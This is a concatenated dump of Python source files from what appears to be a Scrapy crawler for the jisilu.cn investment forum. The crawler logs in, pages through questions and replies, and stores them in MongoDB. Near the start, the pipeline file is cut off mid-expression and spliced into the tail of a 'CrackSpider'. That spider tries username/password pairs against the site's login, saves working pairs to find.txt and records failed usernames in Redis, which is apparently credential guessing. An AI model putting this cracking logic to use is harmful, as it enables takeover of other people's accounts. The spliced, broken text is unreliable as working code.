6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html 7 | import datetime 8 | import logging 9 | 10 | import pymongo 11 | from collections import OrderedDict 12 | from scrapy.exporters import JsonLinesItemExporter 13 | from jsl.items import Relationship, JslItem 14 | from jsl import config 15 | 16 | 17 | class JslPipeline(object): 18 | 19 | def __init__(self): 20 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 21 | self.db = pymongo.MongoClient(connect_uri) 22 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 23 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test'] 24 | self.collection = self.db['db_parker'][config.doc_name] 25 | self.relations = self.db['db_parker']['jsl_relationship'] 26 | try: 27 | self.collection.ensure_index('question_id', unique=True) 28 | except Exception as e: 29 | pass 30 | 31 | def process_item(self, item, spider): 32 | 33 | if isinstance(item, JslItem): 34 | update_time = datetime.datetime.now() 35 | item = dict(item) 36 | item['update_time'] = update_time 37 | 38 | 39 | if self.collection.find_one({'question_id': item['question_id']},{'_id':1}): 40 | # 更新评论部分, 不更新就退出 41 | only_add = False 42 | 43 | try: 44 | only_add = item['only_add'] 45 | 46 | except Exception as e: 47 | pass 48 | 49 | if not only_add: 50 | resp_no = self.collection.find_one({'question_id': item['question_id']},{'resp_no':1}) 51 | resp_no_num = resp_no.get('resp_no') 52 | 53 | if resp_no_num', user) 149 | logger.info('password==>', password) 150 | with open('find.txt','a') as f: 151 | f.write(f'{user}:{password}') 152 | if js_data.get('err','')=='用户名或口令无效': 153 | print('无效,入redis') 154 | self.__redis.sadd('username_run',user) 155 | 156 | if __name__ == '__main__': 157 | spider = CrackSpider() 158 | spider.run() 159 | -------------------------------------------------------------------------------- /jsl/spiders/questions_loop.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import re 3 | import scrapy 4 | from scrapy import Request, FormRequest 5 | from jsl.items import JslItem 6 | from jsl import config 7 | import logging 8 | 9 | LASTEST_ID = config.LASTEST_ID # 394716 10 | 11 | 12 | # 遍历所有questions id 看从哪里开始 13 | class AllcontentSpider(scrapy.Spider): 14 | name = 'questions_loop' 15 | 16 | headers = { 17 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 18 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 19 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 20 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 21 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 22 | 'Referer': 'https://www.jisilu.cn/login/', 23 | 'Accept-Encoding': 'gzip,deflate,br', 24 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 25 | } 26 | 27 | def start_requests(self): 28 | login_url = 'https://www.jisilu.cn/login/' 29 | headers = { 30 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 31 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 32 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 33 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 34 | 'Upgrade-Insecure-Requests': '1', 35 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 36 | 37 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True) 38 | 39 | def login(self, response): 40 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 41 | data = { 42 | 'return_url': 'https://www.jisilu.cn/', 43 | 'user_name': config.jsl_user, 44 | 'password': config.jsl_password, 45 | 'net_auto_login': '1', 46 | '_post_type': 'ajax', 47 | } 48 | 49 | yield FormRequest( 50 | url=url, 51 | headers=self.headers, 52 | formdata=data, 53 | callback=self.parse_, 54 | ) 55 | 56 | def parse_(self, response): 57 | print(response.text) 58 | start_page = LASTEST_ID 59 | 60 | focus_url = 'https://www.jisilu.cn/question/{}'.format(start_page) 61 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': start_page, 'dont_redirect': True,}, 62 | dont_filter=True) 63 | 64 | def parse_item(self, response): 65 | question_id_ = response.meta['question_id'] 66 | 67 | if '问题不存在或已被删除' in response.text: 68 | question_id = question_id_ - 1 69 | if question_id>1: 70 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id) 71 | 72 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, 73 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True) 74 | 75 | else: 76 | 77 | question_id = question_id_ - 1 78 | print(question_id) 79 | if question_id > 1: 80 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id) 81 | 82 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, 83 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True) 84 | 85 | 86 | item = JslItem() 87 | 88 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 89 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 90 | 91 | if s: 92 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 93 | else: 94 | ret = None 95 | 96 | try: 97 | content = ret[0].strip() 98 | except: 99 | content = None 100 | 101 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 102 | 103 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 104 | 105 | url = response.url 106 | 107 | # 添加发起人 108 | try: 109 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 110 | except Exception as e: 111 | print(e) 112 | item['creator'] = None 113 | try: 114 | item['title'] = title.strip() 115 | except Exception as e: 116 | item['title']=None 117 | item['content'] = content 118 | 119 | if resp_no is None: 120 | resp_no = 0 121 | # try: 122 | # item['resp_no'] = int(resp_no) 123 | # except Exception as e: 124 | # logging.warning(e) 125 | # logging.warning('没有回复') 126 | # item['resp_no'] = None 127 | item['only_add'] = True 128 | item['resp_no'] = int(resp_no) 129 | item['question_id'] = question_id_ 130 | createTime = createTime.strip() 131 | if not re.search('^\d', createTime): 132 | createTime = createTime.replace('发表时间 ', '') 133 | # createTime = None 134 | # self.logger.error('创建日期有误:{}'.format(url)) 135 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime): 136 | self.logger.error('创建日期有误:{}'.format(url)) 137 | self.logger.error(createTime) 138 | createTime = None 139 | # 140 | item['createTime'] = createTime 141 | item['url'] = url.strip() 142 | resp = [] 143 | last_resp_date = None 144 | for index, reply in enumerate( 145 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 146 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 147 | 148 | if last_resp_date is None: 149 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 150 | 151 | rep_content = reply.xpath( 152 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 153 | # print rep_content 154 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 155 | try: 156 | int(agree) 157 | except: 158 | agree = 0 159 | 160 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]}) 161 | 162 | item['resp'] = resp 163 | item['last_resp_date'] = last_resp_date 164 | 165 | yield item 166 | 167 | -------------------------------------------------------------------------------- /jsl/spiders/jisilu_user_content.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import logging 4 | import re 5 | import scrapy 6 | from jsl.items import JslItem 7 | from jsl import config 8 | from jsl.spiders.aes_encode import decoder 9 | from scrapy import Request,FormRequest 10 | # 获取某个用户的所有帖子,主要为了慎防大v要删帖,快速下载 11 | 12 | class JisiluSpider(scrapy.Spider): 13 | name = 'single_user' 14 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 15 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 16 | 17 | def __init__(self): 18 | super(JisiluSpider,self).__init__() 19 | 20 | self.headers = { 21 | 'Accept-Language': ' zh-CN,zh;q=0.9', 'Accept-Encoding': ' gzip, deflate, br', 22 | 'X-Requested-With': ' XMLHttpRequest', 'Host': ' www.jisilu.cn', 'Accept': ' */*', 23 | 'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36', 24 | 'Connection': ' keep-alive', 25 | 'Pragma': ' no-cache', 'Cache-Control': ' no-cache', 26 | 'Referer': ' https://www.jisilu.cn/people/dbwolf' 27 | } 28 | 29 | # self.uid = '83220' # 这个id需要在源码页面里面去找 30 | self.uid = config.uid 31 | 32 | self.list_url = 'https://www.jisilu.cn/people/ajax/user_actions/uid-{}__actions-101__page-{}' 33 | 34 | 35 | def start_requests(self): 36 | 37 | login_url = 'https://www.jisilu.cn/login/' 38 | headersx = { 39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 40 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 41 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 42 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 43 | 'Upgrade-Insecure-Requests': '1', 44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 45 | 46 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 47 | 48 | def login(self, response): 49 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 50 | username = decoder(config.jsl_user) 51 | jsl_password = decoder(config.jsl_password) 52 | data = { 53 | 'return_url': 'https://www.jisilu.cn/', 54 | 'user_name': username, 55 | 'password': jsl_password, 56 | 'net_auto_login': '1', 57 | '_post_type': 'ajax', 58 | } 59 | 60 | yield FormRequest( 61 | url=url, 62 | headers=self.headers, 63 | formdata=data, 64 | callback=self.start_fetch_user, 65 | dont_filter=True, 66 | 67 | ) 68 | 69 | 70 | def start_fetch_user(self,response): 71 | current_page=0 72 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse) 73 | 74 | def parse(self, response,**kwargs): 75 | current_page = response.meta['current_page'] 76 | link_list = response.xpath('//body/div[@class="aw-item"]') 77 | if link_list is None: 78 | return 79 | 80 | for link in link_list: 81 | link_=link.xpath('.//div[@class="aw-mod"]/div[@class="aw-mod-head"]/h4/a/@href').extract_first() 82 | match = re.search('/question/(\d+)',link_) 83 | if match: 84 | question_id = match.group(1) 85 | yield scrapy.Request(self.DETAIL_URL.format(question_id), 86 | headers=self.headers, 87 | callback=self.parse_item, 88 | meta={'question_id':question_id}) 89 | 90 | current_page=current_page+1 91 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse) 92 | 93 | 94 | def check_detail(self,response,**kwargs): 95 | 96 | if '您访问的资源需要购买会员' in response.text: 97 | return 98 | 99 | question_id = response.meta['question_id'] 100 | more_page = response.xpath('//div[@class="pagination pull-right"]') 101 | 102 | item = JslItem() 103 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 104 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 105 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 106 | item['question_id'] = question_id 107 | 108 | try: 109 | content = ret[0].strip() 110 | except Exception as e: 111 | logging.error(e) 112 | content = None 113 | 114 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 115 | # 'aw-question-detail-meta' 116 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 117 | 118 | url = response.url 119 | 120 | # 添加发起人 121 | try: 122 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 123 | except Exception as e: 124 | logging.error(e) 125 | item['creator'] = None 126 | 127 | item['title'] = title.strip() 128 | item['content'] = content 129 | try: 130 | item['resp_no'] = int(resp_no) 131 | except Exception as e: 132 | # logging.warning('没有回复') 133 | item['resp_no'] = 0 134 | 135 | item['createTime'] = createTime.replace('发表时间 ', '') 136 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 137 | item['url'] = url.strip() 138 | # item['html'] = response.text 139 | # item['last_resp_date'] = response.meta['last_resp_date'] 140 | 141 | # 多页 142 | if more_page: 143 | 144 | total_resp_no = item['resp_no'] 145 | total_page = total_resp_no // 100 + 1 146 | item['resp'] = [] 147 | 148 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 149 | callback=self.multi_page_detail, 150 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 151 | 'item': item}) 152 | 153 | else: 154 | 155 | resp_ = [] 156 | # 回复内容 157 | resp_time_list = [] 158 | for index, reply in enumerate( 159 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 160 | replay_user = reply.xpath( 161 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 162 | rep_content = reply.xpath( 163 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 164 | 'string(.)').extract_first() 165 | 166 | # 注意这里为了从用户初采集,加了这个字段 167 | rep_time = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 168 | resp_time_list.append(rep_time) 169 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 170 | if agree is None: 171 | agree = 0 172 | else: 173 | agree = int(agree) 174 | 175 | resp_.append( 176 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 177 | if len(resp_time_list)>0: 178 | resp_time = resp_time_list[0] 179 | else: 180 | resp_time=None 181 | item['resp'] = resp_ 182 | item['last_resp_date']=resp_time 183 | 184 | yield item 185 | 186 | # 详情页 187 | def multi_page_detail(self, response): 188 | 189 | current_page = response.meta['page'] 190 | item = response.meta['item'] 191 | total_page = response.meta['total_page'] 192 | question_id = response.meta['question_id'] 193 | 194 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 195 | 196 | for index, reply in enumerate( 197 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 198 | replay_user = reply.xpath( 199 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 200 | rep_content = reply.xpath( 201 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 202 | 'string(.)').extract_first() 203 | if rep_content: 204 | rep_content = rep_content.strip() 205 | # rep_content = '\n'.join(rep_content) 206 | 207 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 208 | if agree is None: 209 | agree = 0 210 | else: 211 | agree = int(agree) 212 | 213 | item['resp'].append( 214 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 215 | 216 | current_page += 1 217 | 218 | if current_page <= total_page: 219 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 220 | callback=self.multi_page_detail, 221 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 222 | 'item': item}) 223 | else: 224 | yield item -------------------------------------------------------------------------------- /jsl/spiders/weekly_content.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | from jsl.spiders.aes_encode import decoder 10 | import pymongo 11 | 12 | # 按照日期爬取, 会损失新人贴 13 | 14 | class WeekContentSpider(scrapy.Spider): 15 | name = 'week_content' 16 | 17 | headers = { 18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 23 | 'Referer': 'https://www.jisilu.cn/login/', 24 | 'Accept-Encoding': 'gzip,deflate,br', 25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 26 | } 27 | 28 | start_page = 1 29 | 30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期 32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 34 | 35 | def __init__(self, daily='yes', *args, **kwargs): 36 | super().__init__(*args, **kwargs) 37 | 38 | if daily == 'yes': 39 | 40 | self.logger.info('按照周') 41 | self.DAYS = 14 # 获取2年的帖子 42 | self.URL = self.POST_DATE_URL 43 | 44 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS) 45 | 46 | 47 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 48 | self.db = pymongo.MongoClient(connect_uri) 49 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 50 | self.collection = self.db['db_parker'][config.doc_name] 51 | 52 | def start_requests(self): 53 | 54 | login_url = 'https://www.jisilu.cn/login/' 55 | headersx = { 56 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 57 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 58 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 59 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 60 | 'Upgrade-Insecure-Requests': '1', 61 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 62 | 63 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 64 | 65 | def login(self, response): 66 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 67 | username = decoder(config.jsl_user) 68 | jsl_password = decoder(config.jsl_password) 69 | data = { 70 | 'return_url': 'https://www.jisilu.cn/', 71 | 'user_name': username, 72 | 'password': jsl_password, 73 | 'net_auto_login': '1', 74 | '_post_type': 'ajax', 75 | } 76 | 77 | yield FormRequest( 78 | url=url, 79 | headers=self.headers, 80 | formdata=data, 81 | callback=self.parse, 82 | dont_filter=True 83 | ) 84 | 85 | def parse(self, response, **kwargs): 86 | print('登录后', response.text) 87 | focus_url = self.URL.format(self.start_page) 88 | 89 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True, 90 | meta={'page': self.start_page}) 91 | 92 | def parse_page(self, response): 93 | 94 | current_page = response.meta['page'] 95 | 96 | nodes = response.xpath('//div[@class="aw-question-list"]/div') 97 | last_resp_date = None 98 | 99 | for node in nodes: 100 | 101 | each_url = node.xpath('.//h4/a/@href').extract_first() 102 | try: 103 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip() 104 | # '回复 • 2018-12-10 09:49 • 46335 次浏览' 105 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1) 106 | except: 107 | logging.error('failed to find date') 108 | continue 109 | else: 110 | # 访问详情 111 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC' 112 | # '"https://www.jisilu.cn/question/336326"' 113 | if re.search('www.jisilu.cn/question/\d+', each_url): 114 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1) 115 | 116 | # if self.question_exist(question_id): 117 | # continue 118 | 119 | # print(f'{question_id}帖子不存在,下载') 120 | 121 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 122 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers, 123 | callback=self.check_detail, 124 | meta={'last_resp_date': last_resp_date, 'question_id': question_id}) 125 | 126 | # 继续翻页 127 | # print(last_resp_date) 128 | if last_resp_date is not None and isinstance(last_resp_date,str): 129 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 130 | 131 | if last_resp_date is not None and (self.last_week < last_resp_date): 132 | # logging.info('last_resp_date ===== {}'.format(last_resp_date)) 133 | 134 | current_page += 1 135 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page, 136 | meta={'page': current_page}) 137 | 138 | def question_exist(self,_id): 139 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 140 | 141 | def compose_content(self,content_list): 142 | string = "" 143 | for line in content_list: 144 | line = line.strip() 145 | if len(line)>0: 146 | string+=line+'\n' 147 | return string 148 | 149 | def check_detail(self, response): 150 | 151 | if '您访问的资源需要购买会员' in response.text: 152 | return 153 | 154 | question_id = response.meta['question_id'] 155 | last_resp_date=response.meta['last_resp_date'] 156 | more_page = response.xpath('//div[@class="pagination pull-right"]') 157 | 158 | item = JslItem() 159 | item['last_resp_date'] = last_resp_date 160 | 161 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 162 | item['question_id'] = question_id 163 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 164 | 165 | content_html = content_node.extract_first() # 获取到源码 166 | 167 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 168 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 169 | # try: 170 | # content = ret[0].strip() 171 | # except Exception as e: 172 | # # logging.error(e) 173 | # content = None 174 | 175 | content_list = content_node.xpath('string(.)').extract() 176 | content_str = self.compose_content(content_list) 177 | 178 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 179 | # 'aw-question-detail-meta' 180 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 181 | 182 | url = response.url 183 | 184 | # 添加发起人 185 | try: 186 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 187 | except Exception as e: 188 | # logging.error(e) 189 | item['creator'] = None 190 | 191 | item['title'] = title.strip() 192 | item['content'] = content_str 193 | item['content_html'] = content_html 194 | 195 | try: 196 | item['resp_no'] = int(resp_no) 197 | except Exception as e: 198 | # logging.warning('没有回复') 199 | item['resp_no'] = 0 200 | if createTime is None: 201 | # print(title) 202 | # print(content) 203 | return 204 | item['createTime'] = createTime.replace('发表时间 ', '') 205 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 206 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','') 207 | 208 | # 多页 209 | if more_page: 210 | 211 | total_resp_no = item['resp_no'] 212 | total_page = total_resp_no // 100 + 1 213 | item['resp'] = [] 214 | 215 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 216 | callback=self.multi_page_detail, 217 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 218 | 'item': item}) 219 | 220 | else: 221 | 222 | resp_ = [] 223 | # 回复内容 224 | for index, reply in enumerate( 225 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 226 | replay_user = reply.xpath( 227 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 228 | rep_content = reply.xpath( 229 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 230 | 'string(.)').extract_first() 231 | # rep_content = '\n'.join(rep_content) 232 | 233 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 234 | if agree is None: 235 | agree = 0 236 | else: 237 | agree = int(agree) 238 | 239 | resp_.append( 240 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 241 | 242 | item['resp'] = resp_ 243 | yield item 244 | 245 | # 详情页 246 | def multi_page_detail(self, response): 247 | 248 | current_page = response.meta['page'] 249 | item = response.meta['item'] 250 | total_page = response.meta['total_page'] 251 | question_id = response.meta['question_id'] 252 | 253 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 254 | 255 | for index, reply in enumerate( 256 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 257 | replay_user = reply.xpath( 258 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 259 | rep_content = reply.xpath( 260 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 261 | 'string(.)').extract_first() 262 | if rep_content: 263 | rep_content = rep_content.strip() 264 | 265 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 266 | if agree is None: 267 | agree = 0 268 | else: 269 | agree = int(agree) 270 | 271 | item['resp'].append( 272 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 273 | 274 | current_page += 1 275 | 276 | if current_page <= total_page: 277 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 278 | callback=self.multi_page_detail, 279 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 280 | 'item': item}) 281 | else: 282 | yield item 283 | -------------------------------------------------------------------------------- /jsl/spiders/allcontent.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | from jsl.spiders.aes_encode import decoder 10 | import pymongo 11 | 12 | # 按照日期爬取, 会损失新人贴 13 | 14 | class AllcontentSpider(scrapy.Spider): 15 | name = 'allcontent' 16 | 17 | headers = { 18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 23 | 'Referer': 'https://www.jisilu.cn/login/', 24 | 'Accept-Encoding': 'gzip,deflate,br', 25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 26 | } 27 | 28 | start_page = 1 29 | 30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期 32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 34 | 35 | def __init__(self, daily='yes', *args, **kwargs): 36 | super().__init__(*args, **kwargs) 37 | 38 | if daily == 'yes': 39 | self.DAYS = config.DAYS 40 | self.URL = self.POST_DATE_URL 41 | 42 | elif daily == 'no': 43 | # 全站爬取 44 | self.logger.info('全站爬取') 45 | self.DAYS = 365 * 2 # 获取2年的帖子 46 | self.URL = self.RESP_DATE_URL # 根据回复时间 47 | else: 48 | return 49 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS) 50 | 51 | 52 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 53 | self.db = pymongo.MongoClient(connect_uri) 54 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 55 | self.collection = self.db[config.db_name][config.doc_name] 56 | 57 | def start_requests(self): 58 | 59 | login_url = 'https://www.jisilu.cn/login/' 60 | headersx = { 61 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 62 | 'Accept-Encoding': 'gzip,deflate,br', 